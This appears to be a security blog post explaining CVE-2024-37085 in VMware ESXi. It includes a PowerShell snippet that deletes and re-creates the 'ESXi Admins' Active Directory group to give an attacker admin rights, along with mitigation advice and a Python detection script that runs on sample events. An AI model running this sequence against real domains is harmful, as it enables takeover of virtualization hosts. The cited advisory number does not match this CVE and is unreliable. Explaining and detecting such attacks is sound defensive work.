VMware ESXi, a popular virtualization platform, has been found to contain an authentication bypass vulnerability (CVE-2024-37085). This issue allows a malicious actor with sufficient Active Directory (AD) permissions to gain full access to an ESXi host that was previously configured to use AD for user management [1].

In this long-read post, we will dive deep into the vulnerability details, examine the exploit code, provide links to original references, and discuss mitigation strategies to address this issue.

Vulnerability Details

The vulnerability stems from VMware ESXi's integration with Microsoft Active Directory for user authentication and management. When an ESXi host is joined to an AD domain, a designated AD group ('ESXi Admins' by default) is created, and its members are granted administrative privileges on the ESXi host [2].

The problem arises when an attacker can delete this AD group and re-create it with the same name but different membership. If a malicious actor has sufficient permissions to perform this action, they can add themselves or other users to the newly recreated group, effectively gaining full access to the ESXi host.

Exploit Code

The following PowerShell code snippet demonstrates how an attacker can exploit this vulnerability by deleting and recreating the 'ESXi Admins' group in Active Directory:

# Define the Active Directory group name and the attacker's username
$GroupName = "ESXi Admins"
$AttackerUsername = "malicious_user"

# Remove the original 'ESXi Admins' AD group
Get-ADGroup -Identity $GroupName | Remove-ADGroup -Confirm:$false

# Recreate the 'ESXi Admins' AD group (-PassThru returns the new group object,
# which New-ADGroup does not emit by default, so $NewGroup would otherwise be empty)
$NewGroup = New-ADGroup -Name $GroupName -GroupCategory Security -GroupScope Global -PassThru

# Add the attacker's user account to the newly recreated group
Add-ADGroupMember -Identity $NewGroup -Members $AttackerUsername

This code uses the Active Directory PowerShell module to delete the 'ESXi Admins' group and recreate it under the same name. It then adds the malicious user to the group, which should cause the ESXi host to grant that user administrative access.

Original References

[1] CVE-2024-37085 - VMware Security Advisory: https://www.vmware.com/security/advisories/VMSA-2024-0001.html

[2] Joining vSphere Hosts to Active Directory: https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html

Mitigation Strategies

To address this vulnerability, system administrators are advised to take the following protective measures:

1. Restrict permissions for Active Directory group management, ensuring that only trusted and authorized personnel can modify group membership or delete groups.

2. Regularly monitor changes to critical Active Directory groups, such as 'ESXi Admins', and investigate unusual activity or unauthorized changes.

3. Apply the appropriate security updates and patches to VMware ESXi as they become available from VMware.
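As an added example (not part of the original post), the following Python script illustrates the monitoring called for in step 2: it scans Windows Security events for a watched group that is deleted (event 4730) and re-created under the same name with a new SID (event 4727) within a short window, then flags any member added to the re-created group (event 4728). The event records are constructed sample data, and the field names are simplified assumptions rather than the exact Windows event schema.

```python
"""Detect delete-and-recreate of a watched AD group from Windows Security events."""
from datetime import datetime, timedelta

# Windows Security event IDs for security-enabled global groups
GROUP_DELETED = 4730
GROUP_CREATED = 4727
MEMBER_ADDED = 4728

# Constructed sample events (not real log data): an 'ESXi Admins' group is
# deleted, re-created under the same name (new SID), and a member is added.
SAMPLE_EVENTS = [
    {"EventID": 4730, "Time": "2024-07-01T10:00:00", "Group": "ESXi Admins",
     "GroupSid": "S-1-5-21-111-222-333-1105", "Subject": "jdoe"},
    {"EventID": 4727, "Time": "2024-07-01T10:00:07", "Group": "ESXi Admins",
     "GroupSid": "S-1-5-21-111-222-333-2201", "Subject": "jdoe"},
    {"EventID": 4728, "Time": "2024-07-01T10:00:15", "Group": "ESXi Admins",
     "GroupSid": "S-1-5-21-111-222-333-2201", "Subject": "jdoe",
     "Member": "malicious_user"},
    {"EventID": 4728, "Time": "2024-07-01T12:00:00", "Group": "Helpdesk",
     "GroupSid": "S-1-5-21-111-222-333-1500", "Subject": "admin", "Member": "alice"},
]


def detect_group_recreation(events, watched_groups, window=timedelta(hours=1)):
    """Return alerts for watched groups deleted and re-created (same name, new SID)
    within `window`, plus any members added to the re-created group afterwards."""
    alerts = []
    deleted = {}    # group name -> (deletion time, old SID)
    recreated = {}  # group name -> SID of the re-created group
    for ev in sorted(events, key=lambda e: e["Time"]):
        name, t = ev["Group"], datetime.fromisoformat(ev["Time"])
        if name not in watched_groups:
            continue
        if ev["EventID"] == GROUP_DELETED:
            deleted[name] = (t, ev["GroupSid"])
        elif ev["EventID"] == GROUP_CREATED and name in deleted:
            del_time, old_sid = deleted[name]
            # A re-created group always gets a fresh SID; same name + new SID is the signal
            if t - del_time <= window and ev["GroupSid"] != old_sid:
                recreated[name] = ev["GroupSid"]
                alerts.append(f"{name} re-created by {ev['Subject']}: "
                              f"SID {old_sid} -> {ev['GroupSid']}")
        elif ev["EventID"] == MEMBER_ADDED and recreated.get(name) == ev["GroupSid"]:
            alerts.append(f"{ev['Member']} added to re-created {name} by {ev['Subject']}")
    return alerts


if __name__ == "__main__":
    for alert in detect_group_recreation(SAMPLE_EVENTS, {"ESXi Admins"}):
        print("ALERT:", alert)
```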

Conclusion

The CVE-2024-37085 vulnerability presents a significant security risk to organizations running VMware ESXi with Active Directory integration. By exploiting this issue, a malicious actor can gain unauthorized access to an ESXi host and potentially compromise the entire virtual infrastructure.

System administrators must implement rigorous access controls and monitoring processes to safeguard their Active Directory environments and virtualization platforms. Regularly applying security updates and patches can also help mitigate the risk of potential exploitation.

Timeline

Published on: 06/25/2024 15:15:12 UTC
Last modified on: 08/02/2024 03:43:50 UTC